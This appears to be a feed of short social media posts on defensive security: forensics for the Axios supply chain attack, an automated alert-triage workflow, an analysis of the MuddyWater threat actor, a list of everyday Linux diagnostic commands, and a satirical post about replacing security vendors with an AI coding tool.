Root User

The Axios supply chain attack is cross-platform, affecting Windows, Linux, and macOS. From a forensic perspective, the same techniques we cover in the official 13Cubed training courses can help identify compromised hosts and detect potential post-exploitation activity. Even the good ole' Windows Run key is abused. As always, Huntress has an excellent writeup: https://t.co/cPUjClvsXV

APT confirmation used to take hours. Now it takes 4 minutes. Attack Discovery correlates alerts into a single narrative. A workflow triggers the agent. The agent: • Looks up the hash on VirusTotal • Runs ES|QL queries across your logs • Finds the on-call analyst • Creates a case • Opens a Slack incident channel All before you read the threat intel report.

MuddyWater is no longer the noisy PowerShell actor defenders once known. Over past 2 years, the Iran-linked threat actor MuddyWater has evolved significantly Moving from basic phishing and script-heavy intrusions to multi-stage operations using Rust-based implants and custom backdoors. FalconFeeds telemetry shows MuddyWater activity clustering around key Iran–Israel and Iran–GCC escalation windows, suggesting its operations are closely aligned with geopolitical tensions. More importantly, MuddyWater appears to play a strategic role in Iran’s cyber ecosystem: harvesting credentials and network access before handing footholds to higher-tier operators Read the full analysis in the blog → https://t.co/SyPcjwm36E For SOC and CTI teams, this evolution highlights how persistent actors adapt quickly. #CyberThreatIntelligence #ThreatIntelligence #APT #Iran #CyberWarfare #SOC #MITREATTACK #falconfeeds

25 Linux commands every DevOps engineer should know, and when you actually use them: 1. top / htop: see what's eating CPU and memory right now 2. ps aux: list every running process with ownership 3. lsof -i: see which process owns which port 4. ss -tulnp: active connections and listening sockets 5. netstat -rn: routing table, useful when traffic goes nowhere 6. tcpdump: capture actual packets when curl lies to you 7. strace: trace system calls, last resort debugging 8. dmesg -T: kernel messages, OOM kills show up here 9. journalctl -b -1: logs from the previous boot 10. df -h / du -sh: disk usage before you get a "no space left" alert 11. free -m: memory overview including buffers and cache 12. vmstat 1: real-time CPU, memory, IO snapshot 13. iotop: which process is hammering disk 14. uptime: load averages, quick node health check 15. who / last: who logged in and when 16. curl -v: full HTTP request/response including headers and TLS 17. dig / nslookup: DNS resolution debugging 18. traceroute / mtr: packet path and where it breaks 19. iptables -L: firewall rules, often the silent culprit 20. systemctl status: service state, last logs, exit codes 21. crontab -l: scheduled jobs, often forgotten until they break 22. find / -name: locate files across the system 23. tar -xvf / gzip: compress, extract, move things around 24. chmod / chown: permission fixes, classic junior task 25. env / printenv: check what environment variables are actually set You don't need to memorize all of them. But if one of these saves you 20 minutes during an incident, it was worth knowing.

We just cancelled our Cybersecurity subscriptions. CrowdStrike. Cloudflare. Okta. All gone. We save over 4M/yr as a company. Instead I just use Claude Code to handle all security measures. We just gave up all our sensitive user data. I am being personally sued by the FTC and am writing this from an undisclosed location.